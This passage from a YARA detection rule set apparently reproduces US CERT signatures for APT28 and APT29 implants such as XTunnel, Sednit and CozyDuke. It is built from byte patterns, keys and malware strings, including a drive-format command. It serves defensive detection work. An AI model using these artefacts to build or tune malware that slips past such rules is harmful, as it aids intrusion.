by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $ = "/c format %c: /Y /X /FS:NTFS" $ = ".exe.sys.drv.doc.docx.xls.xlsx.mdb.ppt.pptx.xml.jpg.jpeg.ini.inf.ttf" wide $ = ".dll.exe.xml.ttf.nfo.fon.ini.cfg.boot.jar" wide $= ".crt.bin.exe.db.dbf.pdf.djvu.doc.docx.xls.xlsx.jar.ppt.pptx.tib.vhd.iso.lib.mdb.accdb.sql.mdf.xml.rtf.ini.cf g.boot.txt.rar.msi.zip.jpg.bmp.jpeg.tiff" wide $tempfilename = "%ls_%ls_%ls_%d.~tmp" ascii wide condition: (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and 2 of them } /* Deactivated - Slowing down scanning rule IMPLANT_4_v12 { meta: description = "BlackEnergy / Voodoo Bear Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $CMP1 = {81 ?? 4D 5A 00 00 } $SUB1 = {81 ?? 00 10 00 00} $CMP2 = {66 81 38 4D 5A} $SUB2 = {2D 00 10 00 00} $HAL = "HAL.dll" $OUT = {E6 64 E9 ?? ?? FF FF} condition: (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and ($CMP1 or $CMP2) and ($SUB1 or $SUB2) and $OUT and $HAL } */ rule IMPLANT_4_v13 { meta: description = "BlackEnergy / Voodoo Bear Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $XMLDOM1 = {81 BF 33 29 36 7B D2 11 B2 0E 00 C0 4F 98 3E 60} $XMLDOM2 = {90 BF 33 29 36 7B D2 11 B2 0E 00 C0 4F 98 3E 60} $XMLPARSE = {8B 06 [0-2] 8D 55 ?C 52 FF 75 08 [0-2] 50 FF 91 04 01 00 00 66 83 7D ?C FF 75 3? 8B 06 [0-2] 8D 55 F? 52 50 [0-2] FF 51 30 85 C0 78 2?} $EXP1 = "DispatchCommand" $EXP2 = "DispatchEvent" $BDATA = {85 C0 74 1? 0F B7 4? 06 83 C? 28 [0-6] 72 ?? 33 C0 5F 5E 5B 5D C2 08 00 8B 4? 0? 8B 4? 0? 89 01 8B 4? 0C 03 [0-2] EB E?} condition: (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them } rule IMPLANT_5_v1 { meta: description = "XTunnel Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $hexstr = {2D 00 53 00 69 00 00 00 2D 00 53 00 70 00 00 00 2D 00 55 00 70 00 00 00 2D 00 50 00 69 00 00 00 2D 00 50 00 70 00 00 00} $UDPMSG1 = "error 2005 recv from server UDP - %d\x0a" $TPSMSG1 = "error 2004 send to TPS - %d\x0a" $TPSMSG2 = "error 2003 recv from TPS - %d\x0a" $UDPMSG2 = "error 2002 send to server UDP - %d\x0a" condition: any of them } rule IMPLANT_5_v2 { meta: description = "XTunnel Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $key0 = { 987AB999FE0924A2DF0A412B14E26093746FCDF9BA31DC05536892C33B116AD3 } $key1 = { 8B236C892D902B0C9A6D37AE4F9842C3070FBDC14099C6930158563C6AC00FF5 } $key2 = { E47B7F110CAA1DA617545567EC972AF3A6E7B4E6807B7981D3CFBD3D8FCC3373 } $key3 = { 48B284545CA1FA74F64FDBE2E605D68CED8A726D05EBEFD9BAAC164A7949BDC1 } $key4 = { FB421558E30FCCD95FA7BC45AC92D2991C44072230F6FBEAA211341B5BF2DC56 } $key5 = { 34F1AE17017AF16021ADA5CE3F77675BBC6E7DEC6478D6078A0B22E5FDFF3B31 } $key6 = { F0EA48F164395186E6F754256EBB812A2AFE168E77ED9501F8B8E6F5B72126A7 } $key7 = { 0B6E9970A8EAF68EE14AB45005357A2F3391BEAA7E53AB760B916BC2B3916ABE } $key8 = { FF032EA7ED2436CF6EEA1F741F99A3522A61FDA8B5A81EC03A8983ED1AEDAB1A } $key9 = { F0DAC1DDFEF7AC6DE1CBE1006584538FE650389BF8565B32E0DE1FFACBCB14BB } $key10 = { A5D699A3CD4510AF11F1AF767602055C523DF74B94527D74319D6EFC6883B80D } $key11 = { 5951B02696C1D5A7B2851D28872384DA607B25F4CEA268FF3FD7FBA75AB3B4B3 } $key12 = { 0465D99B26AF42D8346001BB838595E301BAD8CF5D40CE9C17C944717DF82481 } $key13 = { 5DFE1C83AD5F5CE1BF5D9C42E23225E3ECFDB2493E80E6554A2AC7C722EB4880 } $key14 = { E9650396C45F7783BC14C59F46EA8232E8357C26B5627BFF8C42C6AE2E0F2E17 } $key15 = { 7432AE389125BB4E3980ED7F6A6FB252A42E785A90F4591C3620CA642FF97CA3 } $key16 = { 2B2ADBBC4F960A8916F7088067BAD30BE84B65783FBF9476DF5FDA0E5856B183 } $key17 = { 808C3FD0224A59384161B8A81C8BB404D7197D16D8118CB77067C5C8BD764B3E } $key18 = { 028B0E24D5675C16C815BFE4A073E9778C668E65771A1CE881E2B03F58FC7D5B } $key19 = { 878B7F5CF2DC72BAF1319F91A4880931EE979665B1B24D3394FE72EDFAEF4881 } $key20 = { 7AC7DD6CA34F269481C526254D2F563BC6ECA1779FEEAA33EC1C20E60B686785 } $key21 = { 3044F1D394186815DD8E3A2BBD9166837D07FA1CF6A550E2C170C9CDD9305209 } $key22 = { 7544DC095C441E39D258648FE9CB1267D20D83C8B2D3AB734474401DA4932619 } $key23 = { D702223347406C1999D1A9829CBBE96EC86D377A40E2EE84562EA1FAC1C71498 } $key24 = { CA36CB1177382A1009D392A58F7C1357E94AD2292CC0AE82EE4F7DB0179148E1 } $key25 = { C714F23E4C1C4E55F0E1FA7F5D0DD64658A86F84681D07576D840784154F65DC } $key26 = { 63571BAF736904634AFEE2A70CB9ED64615DE8CA7AEF21E773286B8877D065DB } $key27 = { 27808A9BE98FFE348DE1DB999AC9FDFB26E6C5A0D5E688490EF3D186C43661EB } $key28 = { B6EB86A07A85D40866AFA100789FFB9E85C13F5AA7C7A3B6BA753C7EAB9D6A62 } $key29 = { 88F0020375D60BDB85ACDBFE4BD79CD098DB2B3FA2CEF55D4331DBEFCE455157 } $key30 = { 36535AAB296587AE1162AC5D39492DD1245811C72706246A38FF590645AA5D7B } $key31 = { FDB726261CADD52E10818B49CAB81BEF112CB63832DAA26AD9FC711EA6CE99A4 } $key32 = { 86C0CAA26D9FD07D215BC7EB14E2DA250E905D406AFFAB44FB1C62A2EAFC4670 } $key33 = { BC101329B0E3A7D13F6EBC535097785E27D59E92D449D6D06538725034B8C0F0 } $key34 = { C8D31A78B7C149F62F06497F9DC1DDC4967B566AC52C3A2A65AC7A99643B8A2D } $key35 = { 0EA4A5C565EFBB94F5041392C5F0565B6BADC630D9005B3EADD5D81110623E1F } $key36 = { 06E4E46BD3A0FFC8A4125A6A02B0C56D5D8B9E378CF97539CE4D4ADFAF89FEB5 } $key37 = { 6DE22040821F0827316291331256A170E23FA76E381CA7066AF1E5197AE3CFE7 } $key38 = { C6EF27480F2F6F40910074A45715143954BBA78CD74E92413F785BBA5B2AA121 } $key39 = { 19C96A28F8D9698ADADD2E31F2426A46FD11D2D45F64169EDC7158389BFA59B4 } $key40 = { C3C3DDBB9D4645772373A815B5125BB2232D8782919D206E0E79A6A973FF5D36 } $key41 = { C33AF1608037D7A3AA7FB860911312B4409936D236564044CFE6ED42E54B78A8 } $key42 = { 856A0806A1DFA94B5E62ABEF75BEA3B657D9888E30C8D2FFAEC042930BBA3C90 } $key43 = { 244496C524401182A2BC72177A15CDD2EF55601F1D321ECBF2605FFD1B9B8E3F } $key44 = { DF24050364168606D2F81E4D0DEB1FFC417F1B5EB13A2AA49A89A1B5242FF503 } $key45 = { 54FA07B8108DBFE285DD2F92C84E8F09CDAA687FE492237F1BC4343FF4294248 } $key46 = { 23490033D6BF165B9C45EE65947D6E6127D6E00C68038B83C8BFC2BCE905040C } $key47 = { 4E044025C45680609B6EC52FEB3491130A711F7375AAF63D69B9F952BEFD5F0C } $key48 = { 019F31C5F5B2269020EBC00C1F511F2AC23E9D37E89374514C6DA40A6A03176C } $key49 = { A2483197FA57271B43E7276238468CFB8429326CBDA7BD091461147F642BEB06 } $key50 = { 731C9D6E74C589B7ACB019E5F6A6E07ACF12E68CB9A396CE05AA4D69D5387048 } $key51 = { 540DB6C8D23F7F7FEF9964E53F445F0E56459B10E931DEEEDB2B57B063C7F8B7 } $key52 = { D5AF80A7EEFF26DE988AC3D7CE23E62568813551B2133F8D3E973DA15E355833 } $key53 = { E4D8DBD3D801B1708C74485A972E7F00AFB45161C791EE05282BA68660FFBA45 } $key54 = { D79518AF96C920223D687DD596FCD545B126A678B7947EDFBF24661F232064FB } $key55 = { B57CAA4B45CA6E8332EB58C8E72D0D9853B3110B478FEA06B35026D7708AD225 } $key56 = { 077C714C47DFCF79CA2742B1544F4AA8035BB34AEA9D519DEE77745E01468408 } $key57 = { C3F5550AD424839E4CC54FA015994818F4FB62DE99B37C872AF0E52C376934FA } $key58 = { 5E890432AE87D0FA4D209A62B9E37AAEDEDC8C779008FEBAF9E4E6304D1B2AAC } $key59 = { A42EDE52B5AF4C02CFE76488CADE36A8BBC3204BCB1E05C402ECF450071EFCAB } $key60 = { 4CDAFE02894A04583169E1FB4717A402DAC44DA6E2536AE53F5F35467D31F1CA } $key61 = { 0BEFCC953AD0ED6B39CE6781E60B83C0CFD166B124D1966330CBA9ADFC9A7708 } $key62 = { 8A439DC4148A2F4D5996CE3FA152FF702366224737B8AA6784531480ED8C8877 } $key63 = { CF253BE3B06B310901FF48A351471374AD35BBE4EE654B72B860F2A6EC7B1DBB } $key64 = { A0599F50C4D059C5CFA16821E97C9596B1517B9FB6C6116F260415127F32CE1F } $key65 = { 8B6D704F3DC9150C6B7D2D54F9C3EAAB14654ACA2C5C3952604E65DF8133FE0C } $key66 = { A06E5CDD3871E9A3EE17F7E8DAE193EE47DDB87339F2C599402A78C15D77CEFD } $key67 = { E52ADA1D9BC4C089DBB771B59904A3E0E25B531B4D18B58E432D4FA0A41D9E8A } $key68 = { 4778A7E23C686C171FDDCCB8E26F98C4CBEBDF180494A647C2F6E7661385F05B } $key69 = { FE983D3A00A9521F871ED8698E702D595C0C7160A118A7630E8EC92114BA7C12 } $key70 = { 52BA4C52639E71EABD49534BBA80A4168D15762E2D1D913BAB5A5DBF14D9D166 } $key71 = { 931EB8F7BC2AE1797335C42DB56843427EB970ABD601E7825C4441701D13D7B1 } $key72 = { 318FA8EDB989672DBE2B5A74949EB6125727BD2E28A4B084E8F1F50604CCB735 } $key73 = { 5B5F2315E88A42A7B59C1B493AD15B92F819C021BD70A5A6619AAC6666639BC2 } $key74 = { C2BED7AA481951FEB56C47F03EA38236BC425779B2FD1F1397CB79FE2E15C0F0 } $key75 = { D3979B1CB0EC1A655961559704D7CDC019253ACB2259DFB92558B7536D774441 } $key76 = { 0EDF5DBECB772424D879BBDD51899D6AAED736D0311589566D41A9DBB8ED1CC7 } $key77 = { CC798598F0A9BCC82378A5740143DEAF1A147F4B2908A197494B7202388EC905 } $key78 = { 074E9DF7F859BF1BD1658FD2A86D81C282000EAB09AF4252FAB45433421D3849 } $key79 = { 6CD540642E007F00650ED20D7B54CFFD54DDA95D8DEBB087A004BAE222F22C8E } $key80 = { C76CF2F66C71F6D17FC8DEFA1CAEF8718BA1CE188C7EA02C835A0FA54D3B3314 } $key81 = { A7250A149600E515C9C40FE5720756FDA8251635A3B661261070CB5DABFE7253 } $key82 = { 237C67B97D4CCE4610DE2B82E582808EA796C34A4C24715C953CBA403B2C935E } $key83 = { A8FA182547E66B57C497DAAA195A38C0F0FB0A3C1F7B98B4B852F5F37E885127 } $key84 = { 83694CCA50B821144FFBBE6855F62845F1328111AE1AC5666CBA59EB43AA12C6 } $key85 = { 145E906416B17865AD37CD022DF5481F28C930D6E3F53C50B0953BF33F4DB953 } $key86 = { AB49B7C2FA3027A767F5AA94EAF2B312BBE3E89FD924EF89B92A7CF977354C22 } $key87 = { 7E04E478340C209B01CA2FEBBCE3FE77C6E6169F0B0528C42FA4BDA6D90AC957 } $key88 = { 0EADD042B9F0DDBABA0CA676EFA4EDB68A045595097E5A392217DFFC21A8532F } $key89 = { 5623710F134ECACD5B70434A1431009E3556343ED48E77F6A557F2C7FF46F655 } $key90 = { 6968657DB62F4A119F8E5CB3BF5C51F4B285328613AA7DB9016F8000B576561F } $key91 = { DEBB9C95EAE6A68974023C335F8D2711135A98260415DF05845F053AD65B59B4 } $key92 = { 16F54900DBF08950F2C5835153AB636605FB8C09106C0E94CB13CEA16F275685 } $key93 = { 1C9F86F88F0F4882D5CBD32876368E7B311A84418692D652A6A4F315CC499AE8 } $key94 = { E920E0783028FA05F4CE2D6A04BBE636D56A775CFD4DAEA3F2A1B8BEEB52A6D4 } $key95 = { 73874CA3AF47A8A315D50E1990F44F655EC7C15B146FFE0611B6C4FC096BD07C } $key96 = { F21C1FA163C745789C53922C47E191A5A85301BDC2FFC3D3B688CFBFF39F3BE5 } $key97 = { BC5A861F21CB98BD1E2AE9650B7A0BB4CD0C71900B3463C1BC3380AFD2BB948E } $key98 = { 151BAE36E646F30570DC6A7B57752F2481A0B48DD5184E914BCF411D8AD5ACA0 } $key99 = { F05AD6D7A0CADC10A6468BFDBCBB223D5BD6CA30EE19C239E8035772D80312C9 } $key100 = { 5DE9A0FDB37C0D59C298577E5379BCAF4F86DF3E9FA17787A4CEFA7DD10C462E } $key101 = { F5E62BA862380224D159A324D25FD321E5B35F8554D70CF9A506767713BCA508 } $key102 = { A2D1B10409B328DA0CCBFFDE2AD2FF10855F95DA36A1D3DBA84952BB05F8C3A7 } $key103 = { C974ABD227D3AD339FAC11C97E11D904706EDEA610B181B8FAD473FFCC36A695 } $key104 = { AB5167D2241406C3C0178D3F28664398D5213EE5D2C09DCC9410CB604671F5F1 } $key105 = { C25CC4E671CAAA31E137700A9DB3A272D4E157A6A1F47235043D954BAE8A3C70 } $key106 = { E6005757CA0189AC38F9B6D5AD584881399F28DA949A0F98D8A4E3862E20F715 } $key107 = { 204E6CEB4FF59787EF4D5C9CA5A41DDF4445B9D8E0C970B86D543E9C7435B194 } $key108 = { 831D7FD21316590263B69E095ABBE89E01A176E16AE799D83BD774AF0D254390 } $key109 = { 42C36355D9BC573D72F546CDB12E6BB2CFE2933AC92C12040386B310ABF6A1ED } $key110 = { B9044393C09AD03390160041446BF3134D864D16B25F1AB5E5CDC690C4677E7D } $key111 = { 6BC1102B5BE05EEBF65E2C3ACA1F4E17A59B2E57FB480DE016D371DA3AEF57A5 } $key112 = { B068D00B482FF73F8D23795743C76FE8639D405EE54D3EFB20AFD55A9E2DFF4E } $key113 = { 95CF5ADDFE511C8C7496E3B75D52A0C0EFE01ED52D5DD04D0CA6A7ABD3A6F968 } $key114 = { 75534574A4620019F8E3D055367016255034FA7D91CBCA9E717149441742AC8D } $key115 = { 96F1013A5301534BE424A11A94B740E5EB3A627D052D1B769E64BAB6A666433C } $key116 = { 584477AB45CAF729EE9844834F84683ABECAB7C4F7D23A9636F54CDD5B8F19B3 } $key117 = { D3905F185B564149EE85CC3D093477C8FF2F8CF601C68C38BBD81517672ECA3A } $key118 = { BF29521A7F94636D1930AA236422EB6351775A523DE68AF9BF9F1026CEDA618D } $key119 = { 04B3A783470AF1613A9B849FBD6F020EE65C612343EB1C028B2C28590789E60B } $key120 = { 3D8D8E84977FE5D21B6971D8D873E7BED048E21333FE15BE2B3D1732C7FD3D04 } $key121 = { 8ACB88224B6EF466D7653EB0D8256EA86D50BBA14FD05F7A0E77ACD574E9D9FF } $key122 = { B46121FFCF1565A77AA45752C9C5FB3716B6D8658737DF95AE8B6A2374432228 } $key123 = { A4432874588D1BD2317224FB371F324DD60AB25D4191F2F01C5C13909F35B943 } $key124 = { 78E1B7D06ED2A2A044C69B7CE6CDC9BCD77C19180D0B082A671BBA06507349C8 } $key125 = { 540198C3D33A631801FE94E7CB5DA3A2D9BCBAE7C7C3112EDECB342F3F7DF793 } $key126 = { 7E905652CAB96ACBB7FEB2825B55243511DF1CD8A22D0680F83AAF37B8A7CB36 } $key127 = { 37218801DBF2CD92F07F154CD53981E6189DBFBACAC53BC200EAFAB891C5EEC8 } condition: any of them } rule IMPLANT_5_v3 { meta: description = "XTunnel Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $BYTES1 = { 0F AF C0 6? C0 07 00 00 00 2D 01 00 00 00 0F AF ?? 39 ?8 } $BYTES2 = { 0F AF C0 6? C0 07 48 0F AF ?? 39 ?8 } condition: any of them } rule IMPLANT_5_v4 { meta: description = "XTunnel Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $FBKEY1 = { 987AB999FE0924A2DF0A412B14E26093746FCDF9BA31DC05536892C33B116AD3 } $FBKEY2 = { 8B236C892D902B0C9A6D37AE4F9842C3070FBDC14099C6930158563C6AC00FF5 } $FBKEY3 = { E47B7F110CAA1DA617545567EC972AF3A6E7B4E6807B7981D3CFBD3D8FCC3373 } $FBKEY4 = { 48B284545CA1FA74F64FDBE2E605D68CED8A726D05EBEFD9BAAC164A7949BDC1 } $FBKEY5 = { FB421558E30FCCD95FA7BC45AC92D2991C44072230F6FBEAA211341B5BF2DC56 } condition: all of them } rule IMPLANT_6_v1 { meta: description = "Sednit / EVILTOSS Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $STR1 = "dll.dll" wide ascii $STR2 = "Init1" wide ascii $STR3 = "netui.dll" wide ascii condition: (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them } rule IMPLANT_6_v2 { meta: description = "Sednit / EVILTOSS Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $obf_func = { 8B 45 F8 6A 07 03 C7 33 D2 89 45 E8 8D 47 01 5B 02 4D 0F F7 F3 6A 07 8A 04 32 33 D2 F6 E9 8A C8 8B C7 F7 F3 8A 44 3E FE 02 45 FC 02 0C 32 B2 03 F6 EA 8A D8 8D 47 FF 33 D2 5F F7 F7 02 5D 14 8B 45 E8 8B 7D F4 C0 E3 06 02 1C 32 32 CB 30 08 8B 4D 14 41 47 83 FF 09 89 4D 14 89 7D F4 72 A1 } condition: (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them } rule IMPLANT_6_v3 { meta: description = "Sednit / EVILTOSS Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $deob_func = { 8D 46 01 02 D1 83 E0 07 8A 04 38 F6 EA 8B D6 83 E2 07 0A 04 3A 33 D2 8A 54 37 FE 03 D3 03 D1 D3 EA 32 C2 8D 56 FF 83 E2 07 8A 1C 3A 8A 14 2E 32 C3 32 D0 41 88 14 2E 46 83 FE 0A 7C ?? } condition: (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them } rule IMPLANT_6_v4 { meta: description = "Sednit / EVILTOSS Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $ASM = {53 5? 5? [6-15] ff d? 8b ?? b? a0 86 01 00 [7-13] ff d? ?b [6-10] c0 [0-1] c3} condition: (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them } rule IMPLANT_6_v5 { meta: description = "Sednit / EVILTOSS Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $STR1 = { 83 EC 18 8B 4C 24 24 B8 AB AA AA AA F7 E1 8B 44 24 20 53 55 8B EA 8D 14 08 B8 AB AA AA AA 89 54 24 1C F7 E2 56 8B F2 C1 ED 02 8B DD 57 8B 7C 24 38 89 6C 24 1C C1 EE 02 3B DE 89 5C 24 18 89 74 24 20 0F 83 CF 00 00 00 8D 14 5B 8D 44 12 FE 89 44 24 10 3B DD 0F 85 CF 00 00 00 8B C1 33 D2 B9 06 00 00 00 F7 F1 8B CA 83 F9 06 89 4C 24 38 0F 83 86 00 00 00 8A C3 B2 06 F6 EA 8B 54 24 10 88 44 24 30 8B 44 24 2C 8D 71 02 03 D0 89 54 24 14 8B 54 24 10 33 C0 8A 44 37 FE 03 D6 8B D8 8D 46 FF 0F AF DA 33 D2 BD 06 00 00 00 F7 F5 C1 EB 07 8A 04 3A 33 D2 32 D8 8D 46 01 F7 F5 8A 44 24 30 02 C1 8A 0C 3A 33 D2 32 C8 8B C6 F7 F5 8A 04 3A 22 C8 8B 44 24 14 02 D9 8A 0C 30 32 CB 88 0C 30 8B 4C 24 38 41 46 83 FE 08 89 4C 24 38 72 A1 8B 5C 24 18 8B 6C 24 1C 8B 74 24 20 8B 4C 24 10 43 83 C1 06 3B DE 89 4C 24 10 8B 4C 24 34 89 5C 24 18 0F 82 3C FF FF FF 3B DD 75 1A 8B C1 33 D2 B9 06 00 00 00 F7 F1 8B CA EB 0D 33 C9 89 4C 24 38 E9 40 FF FF FF 33 C9 8B 44 24 24 33 D2 BE 06 00 00 00 89 4C 24 38 F7 F6 3B CA 89 54 24 24 0F 83 95 00 00 00 8A C3 B2 06 F6 EA 8D 1C 5B 88 44 24 30 8B 44 24 2C 8D 71 02 D1 E3 89 5C 24 34 8D 54 03 FE 89 54 24 14 EB 04 8B 5C 24 34 33 C0 BD 06 00 00 00 8A 44 3E FE 8B D0 8D 44 1E FE 0F AF D0 C1 EA 07 89 54 24 2C 8D 46 FF 33 D2 BB 06 00 00 00 F7 F3 8B 5C 24 2C 8A 04 3A 33 D2 32 D8 8D 46 01 F7 F5 8A 44 24 30 02 C1 8A 0C 3A 33 D2 32 C8 8B C6 F7 F5 8A 04 3A 22 C8 8B 44 24 14 02 D9 8A 0C 06 32 CB 88 0C 06 8B 4C 24 38 8B 44 24 24 41 46 3B C8 89 4C 24 38 72 8F 5F 5E 5D 5B 83 C4 18 C2 10 00 } condition: (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them } rule IMPLANT_6_v6 { meta: description = "Sednit / EVILTOSS Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $Init1_fun = {68 10 27 00 00 FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 6A FF 50 FF 15 ?? ?? ?? ?? 33 C0 C3} condition: (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them } /* TOO MANY FALSE POSITIVES rule IMPLANT_6_v7 { meta: description = "Sednit / EVILTOSS Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $STR1 = "Init1" $OPT1 = "ServiceMain" $OPT2 = "netids" nocase wide ascii $OPT3 = "netui" nocase wide ascii $OPT4 = "svchost.exe" wide ascii $OPT5 = "network" nocase wide ascii condition: (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and $STR1 and 2 of ($OPT*) } */ rule IMPLANT_7_v1 { meta: description = "Implant 7 by APT29" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $STR1 = { 8A 44 0A 03 32 C3 0F B6 C0 66 89 04 4E 41 3B CF 72 EE } $STR2 = { F3 0F 6F 04 08 66 0F EF C1 F3 0F 7F 04 11 83 C1 10 3B CF 72 EB } condition: (uint16(0) == 0x5A4D) and ($STR1 or $STR2) } rule IMPLANT_8_v1 { meta: description = "HAMMERTOSS / HammerDuke Implant by APT29" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $DOTNET = "mscorlib" ascii $REF_URL = "https://www.google.com/url?sa=" wide $REF_var_1 = "&rct=" wide $REF_var_2 = "&q=&esrc=" wide $REF_var_3 = "&source=" wide $REF_var_4 = "&cd=" wide $REF_var_5 = "&ved=" wide $REF_var_6 = "&url=" wide $REF_var_7 = "&ei=" wide $REF_var_8 = "&usg=" wide $REF_var_9 = "&bvm=" wide $REF_value_1 = "QFj" wide $REF_value_2 = "bv.81" wide condition: (uint16(0) == 0x5A4D) and ($DOTNET) and ($REF_URL) and (3 of ($REF_var*)) and (1 of ($REF_value*)) } /* TOO MANY FALSE POSITIVES rule IMPLANT_8_v2 { meta: description = "HAMMERTOSS / HammerDuke Implant by APT29" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $DOTNET= "mscorlib" ascii $XOR = {61 20 AA 00 00 00 61} condition: (uint16(0) == 0x5A4D) and all of them } */ rule IMPLANT_9_v1 { meta: description = "Onion Duke Implant by APT29" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $STR1 = { 8B 03 8A 54 01 03 32 55 FF 41 88 54 39 FF 3B CE 72 EE } $STR2 = { 8B C8 83 E1 03 8A 54 19 08 8B 4D 08 32 54 01 04 40 88 54 38 FF 3B C6 72 E7 } $STR3 = { 8B 55 F8 8B C8 83 E1 03 8A 4C 11 08 8B 55 FC 32 0C 10 8B 17 88 4C 02 04 40 3B 06 72 E3 } condition: (uint16(0) == 0x5A4D or uint16(0)) and all of them } /* TOO MANY FALSE POSITIVES rule IMPLANT_10_v1 { meta: description = "CozyDuke / CozyCar / CozyBear Implant by APT29" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $STR1 = {33 ?? 83 F2 ?? 81 E2 FF 00 00 00} $STR2 = {0F BE 14 01 33 D0 ?? F2 [1-4] 81 E2 FF 00 00 00 66 89 [6] 40 83 F8 ?? 72} condition: uint16(0) == 0x5A4D and ($STR1 or $STR2) } */ rule IMPLANT_10_v2 { meta: description = "CozyDuke / CozyCar / CozyBear Implant by APT29" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $xor = { 34 ?? 66 33 C1 48 FF C1 } $nop = { 66 66 66 66 66 66 0f 1f 84 00 00 00 00 00} condition: uint16(0) == 0x5A4D and $xor and $nop } /* Deactivated - Slowing down scanning rule IMPLANT_11_v12 { meta: description = "Mini Duke Implant by APT29" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $STR1 = {63 74 00 00} // ct $STR2 = {72 6F 74 65} // rote $STR3 = {75 61 6C 50} // triV $STR4 = {56 69 72 74} // Plau $STR5 = { e8 00 00 00 00 } $STR6 = { 64 FF 35 00 00 00 00 } $STR7 = {D2 C0} $STR8 = /\x63\x74\x00\x00.{3,20}\x72\x6F\x74\x65.{3,20}\x75\x61\x6C\x50.{3,20}\x56\x69\x72\x74/ condition: (uint16(0) == 0x5A4D) and #STR5 > 4 and all of them } rule IMPLANT_12_v1 { meta: description = "Cosmic Duke Implant by APT29" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $FUNC = {A1 [3-5] 33 C5 89 [2-3] 56 57 83 [4-6] 64} condition: (uint16(0) == 0x5A4D) and $FUNC } */ rule Unidentified_Malware_Two { meta: description = "Unidentified Implant by APT29" author = "US CERT" reference = 